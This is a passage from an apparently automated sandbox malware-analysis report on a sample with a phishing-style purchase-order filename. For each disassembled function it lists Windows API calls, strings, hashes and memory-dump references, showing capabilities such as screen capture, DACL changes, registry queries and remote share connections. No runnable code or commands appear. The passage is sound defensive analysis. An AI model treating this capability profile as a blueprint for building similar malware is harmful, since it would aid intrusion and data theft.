                        • GetFileAttributesW.KERNEL32(?), ref: 00300CFE
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00300D18
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00300D2A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                        • String ID: *.*
                        • API String ID: 34673085-438819550
                        • Opcode ID: ca836f18f192b7ed02eab819ef07e73c801dd0287dbc411651ed063a29dff792
                        • Instruction ID: 7e40deeb4059320e3006d888beaa1f96f59bdf359a34d2057a399cc2dfce5d0f
                        • Opcode Fuzzy Hash: ca836f18f192b7ed02eab819ef07e73c801dd0287dbc411651ed063a29dff792
                        • Instruction Fuzzy Hash: 5381B5715053059FD729DF68C854BABB7E8AF89310F15892EF889CB291EB30DD84CB52
                        Function 0031ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0031ED0C
                        • GetFocus.USER32 ref: 0031ED1C
                        • GetDlgCtrlID.USER32(00000000), ref: 0031ED27
                        • _memset.LIBCMT ref: 0031EE52
                        • GetMenuItemInfoW.USER32 ref: 0031EE7D
                        • GetMenuItemCount.USER32(00000000), ref: 0031EE9D
                        • GetMenuItemID.USER32(?,00000000), ref: 0031EEB0
                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0031EEE4
                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0031EF2C
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0031EF64
                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0031EF99
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                        • String ID: 0
                        • API String ID: 1296962147-4108050209
                        • Opcode ID: 430ad8c3351ccf17dac8685e663083a47c0cd28ad1c62aeccf5a0b0670adb767
                        • Instruction ID: fbde4fb987adceba9081d050f1c8ad407e647a4f3dbc088d0f9e9eb39e39659b
                        • Opcode Fuzzy Hash: 430ad8c3351ccf17dac8685e663083a47c0cd28ad1c62aeccf5a0b0670adb767
                        • Instruction Fuzzy Hash: 46818D71108311AFDB1ACF14D884AABBBE8FB8C354F11092DFD9997291D731D985CBA2
                        Function 002EB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002EB903
                          • Part of subcall function 002EB8E7: GetLastError.KERNEL32(?,002EB3CB,?,?,?), ref: 002EB90D
                          • Part of subcall function 002EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,002EB3CB,?,?,?), ref: 002EB91C
                          • Part of subcall function 002EB8E7: HeapAlloc.KERNEL32(00000000,?,002EB3CB,?,?,?), ref: 002EB923
                          • Part of subcall function 002EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002EB93A
                          • Part of subcall function 002EB982: GetProcessHeap.KERNEL32(00000008,002EB3E1,00000000,00000000,?,002EB3E1,?), ref: 002EB98E
                          • Part of subcall function 002EB982: HeapAlloc.KERNEL32(00000000,?,002EB3E1,?), ref: 002EB995
                          • Part of subcall function 002EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002EB3E1,?), ref: 002EB9A6
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002EB5F7
                        • _memset.LIBCMT ref: 002EB60C
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002EB62B
                        • GetLengthSid.ADVAPI32(?), ref: 002EB63C
                        • GetAce.ADVAPI32(?,00000000,?), ref: 002EB679
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002EB695
                        • GetLengthSid.ADVAPI32(?), ref: 002EB6B2
                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002EB6C1
                        • HeapAlloc.KERNEL32(00000000), ref: 002EB6C8
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002EB6E9
                        • CopySid.ADVAPI32(00000000), ref: 002EB6F0
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002EB721
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002EB747
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002EB75B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        • API String ID: 3996160137-0
                        • Opcode ID: 37a95353d47e33558e9086ee0d2ac2a1cbdaf4430ede4ec499ab6093dc3f5baa
                        • Instruction ID: 86fe07baddc3e1805449dc6f7d7bff7b61b6e074c0cb835ba112ebecebfcfd96
                        • Opcode Fuzzy Hash: 37a95353d47e33558e9086ee0d2ac2a1cbdaf4430ede4ec499ab6093dc3f5baa
                        • Instruction Fuzzy Hash: 9D516B7191024AAFDF06DFA2DC85EEEBB79FF44700F448129F915A7290DB309A25CB60
                        Function 0030A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 0030A2DD
                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0030A2E9
                        • CreateCompatibleDC.GDI32(?), ref: 0030A2F5
                        • SelectObject.GDI32(00000000,?), ref: 0030A302
                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0030A356
                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0030A392
                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0030A3B6
                        • SelectObject.GDI32(00000006,?), ref: 0030A3BE
                        • DeleteObject.GDI32(?), ref: 0030A3C7
                        • DeleteDC.GDI32(00000006), ref: 0030A3CE
                        • ReleaseDC.USER32(00000000,?), ref: 0030A3D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                        • String ID: (
                        • API String ID: 2598888154-3887548279
                        • Opcode ID: 2cc027247c48380cba39917508b99a864b5a697f171715d57fd01727d57c3ac9
                        • Instruction ID: 873dee671b7bb93a35a227ebc87d45fabdeddb515104fe9351dc1155fff7d73c
                        • Opcode Fuzzy Hash: 2cc027247c48380cba39917508b99a864b5a697f171715d57fd01727d57c3ac9
                        • Instruction Fuzzy Hash: 40515A75900709EFCB16CFA8EC85EAEBBB9EF48710F14841DF95AA7250C735A841CB50
                        Function 00313AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00312AA6,?,?), ref: 00313B0E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E6
                        • API String ID: 3964851224-433370824
                        • Opcode ID: f102668765818bea7981748e28580430a1fed709cd70552a2252be7749260518
                        • Instruction ID: ffbcdba4a2cad63e916e24dc25f26f95445a6abf893a7cdd3737305751221c6c
                        • Opcode Fuzzy Hash: f102668765818bea7981748e28580430a1fed709cd70552a2252be7749260518
                        • Instruction Fuzzy Hash: B941D7341102468FCF0AEF04D940BEA3366BF1A354F154528FC525B295DB70DEA9CF91
                        Function 002F32B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00323C64,00000010,00000000,Bad directive syntax error,0034DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 002F32D1
                        • LoadStringW.USER32(00000000,?,00323C64,00000010), ref: 002F32D8
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • _wprintf.LIBCMT ref: 002F3309
                        • __swprintf.LIBCMT ref: 002F332B
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002F3395
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"7
                        • API String ID: 1506413516-731021026
                        • Opcode ID: 9f829d4a6917d740461df62184f2f60fcf0675c76fca26a8103e2977cc868ec0
                        • Instruction ID: 903bb2edd3af9f8912579fbf8799ae2a46697ceace6fed4d65b5f5c50d8b0b6f
                        • Opcode Fuzzy Hash: 9f829d4a6917d740461df62184f2f60fcf0675c76fca26a8103e2977cc868ec0
                        • Instruction Fuzzy Hash: 73216D3186021EFBDF02EF90CC4AEEE7779BF24740F004456F615A10A1DAB1AA68DF90
                        Function 002FD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 002FD567
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 002FD589
                        • __swprintf.LIBCMT ref: 002FD5DC
                        • _wprintf.LIBCMT ref: 002FD68D
                        • _wprintf.LIBCMT ref: 002FD6AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LoadString_wprintf$__swprintf_memmove
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 2116804098-2391861430
                        • Opcode ID: a83e1465f811b30c78c2e634c3c250de09db895b4bc82b548fdab4094803ebbe
                        • Instruction ID: 912b88e427508ace5fe2613acedcdcb28a6456f150ac86ddaed0403d8011ffca
                        • Opcode Fuzzy Hash: a83e1465f811b30c78c2e634c3c250de09db895b4bc82b548fdab4094803ebbe
                        • Instruction Fuzzy Hash: 43519372910109BACB15FBA0DD82EEEF7B9AF14740F104566F205B21A1EB716F68DF60
                        Function 002FD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 002FD37F
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002FD3A0
                        • __swprintf.LIBCMT ref: 002FD3F3
                        • _wprintf.LIBCMT ref: 002FD499
                        • _wprintf.LIBCMT ref: 002FD4B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LoadString_wprintf$__swprintf_memmove
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 2116804098-3420473620
                        • Opcode ID: 1430ae594a3f8a0e6bfe3c80ece1c54fe55a70eb448c79c157cf654899d41a51
                        • Instruction ID: a88975fa34d7d4b263330819734825422b3eb6a8534fd2b1d54da529335c8637
                        • Opcode Fuzzy Hash: 1430ae594a3f8a0e6bfe3c80ece1c54fe55a70eb448c79c157cf654899d41a51
                        • Instruction Fuzzy Hash: F851B472910109BADB15FBA0CD82EEEF7B9AF14744F104466F205B20A1EB716F68DF60
                        Function 002EAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • _memset.LIBCMT ref: 002EAF74
                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002EAFA9
                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002EAFC5
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002EAFE1
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002EB00B
                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002EB033
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002EB03E
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002EB043
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                        • API String ID: 1411258926-22481851
                        • Opcode ID: 62721e22e14da508ed0ff296e6b0bfb2649eea694226d9bb492c3d13d4cd4bb0
                        • Instruction ID: 2a473eee6e7ce5c65feaaadc4f30504b77d7cdd0395e2d3e9226856bddc5b301
                        • Opcode Fuzzy Hash: 62721e22e14da508ed0ff296e6b0bfb2649eea694226d9bb492c3d13d4cd4bb0
                        • Instruction Fuzzy Hash: 3E410C75C20629ABCF15EFA4DC959EEB7B8BF14740F404069F901A2151EB719E25CF50
                        Function 002F7212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                        Download Yara Rule
                        APIs
                        • __swprintf.LIBCMT ref: 002F7226
                        • __swprintf.LIBCMT ref: 002F7233
                          • Part of subcall function 002D234B: __woutput_l.LIBCMT ref: 002D23A4
                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 002F725D
                        • LoadResource.KERNEL32(?,00000000), ref: 002F7269
                        • LockResource.KERNEL32(00000000), ref: 002F7276
                        • FindResourceW.KERNEL32(?,?,00000003), ref: 002F7296
                        • LoadResource.KERNEL32(?,00000000), ref: 002F72A8
                        • SizeofResource.KERNEL32(?,00000000), ref: 002F72B7
                        • LockResource.KERNEL32(?), ref: 002F72C3
                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002F7322
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                        • String ID: L66
                        • API String ID: 1433390588-3228019034
                        • Opcode ID: bf6a961c523a5ee0bff5c4286d1335a6b0ec9b894f18eabefb3bca9bb223c15b
                        • Instruction ID: 2920abbe20473c07a9f8fc5f65c4d59c0f4fcbd295daaf3397a4999dc84554ac
                        • Opcode Fuzzy Hash: bf6a961c523a5ee0bff5c4286d1335a6b0ec9b894f18eabefb3bca9bb223c15b
                        • Instruction Fuzzy Hash: 7D31907191425ABBDB129F60EC85ABFBBADFF04380F004825FE05D2151E774D961DBA0
                        Function 002F83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002F843F
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002F8455
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002F8466
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002F8478
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002F8489
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: SendString$_memmove
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2279737902-1007645807
                        • Opcode ID: 73a9e3cc7ec01e2152e0f0daa3638847e4ef23a37f96617950c3e6db7085cf4f
                        • Instruction ID: 0d9657ffda68272c695646f0b2544166419142fb89520717c230a1a3586ad9a7
                        • Opcode Fuzzy Hash: 73a9e3cc7ec01e2152e0f0daa3638847e4ef23a37f96617950c3e6db7085cf4f
                        • Instruction Fuzzy Hash: DD11E7A1A6016E79D711EBA1CC4ADFFBB7CEFD1B80F004429B411A30C5DEA05E18C9B0
                        Function 002F8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • timeGetTime.WINMM ref: 002F809C
                          • Part of subcall function 002CE3A5: timeGetTime.WINMM(?,75C0B400,00326163), ref: 002CE3A9
                        • Sleep.KERNEL32(0000000A), ref: 002F80C8
                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 002F80EC
                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 002F810E
                        • SetActiveWindow.USER32 ref: 002F812D
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002F813B
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 002F815A
                        • Sleep.KERNEL32(000000FA), ref: 002F8165
                        • IsWindow.USER32 ref: 002F8171
                        • EndDialog.USER32(00000000), ref: 002F8182
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                        • String ID: BUTTON
                        • API String ID: 1194449130-3405671355
                        • Opcode ID: 32444d3a8e25146eca1e176b0b7bd6f86d6955ebd1504ccb573eeccb8921237a
                        • Instruction ID: 8b82ac857839c61fabe3b181a6ec2bd60dbc8fd3041e2e1245cbbe431fe5b2f6
                        • Opcode Fuzzy Hash: 32444d3a8e25146eca1e176b0b7bd6f86d6955ebd1504ccb573eeccb8921237a
                        • Instruction Fuzzy Hash: D5218E71360209BFE7275F22EC8DE36BB6EE7053C9F440228F61982261CF724D65AA11
                        Function 002F78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                        • String ID: 0.0.0.0
                        • API String ID: 208665112-3771769585
                        • Opcode ID: 0756519dcc5dbaa8157a5c6d02b82c2fdfc6e2fb3fd88a161c7377d83d9f5e07
                        • Instruction ID: 1b93d6b49f8426bddee153dd4ffe34238b921ef9601119991af8ffb8eee821c4
                        • Opcode Fuzzy Hash: 0756519dcc5dbaa8157a5c6d02b82c2fdfc6e2fb3fd88a161c7377d83d9f5e07
                        • Instruction Fuzzy Hash: F9112731918119AFDB21AF70EC4AEEAB3ACEF00720F000176F50596190EFB0DFA08A60
                        Function 003008D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
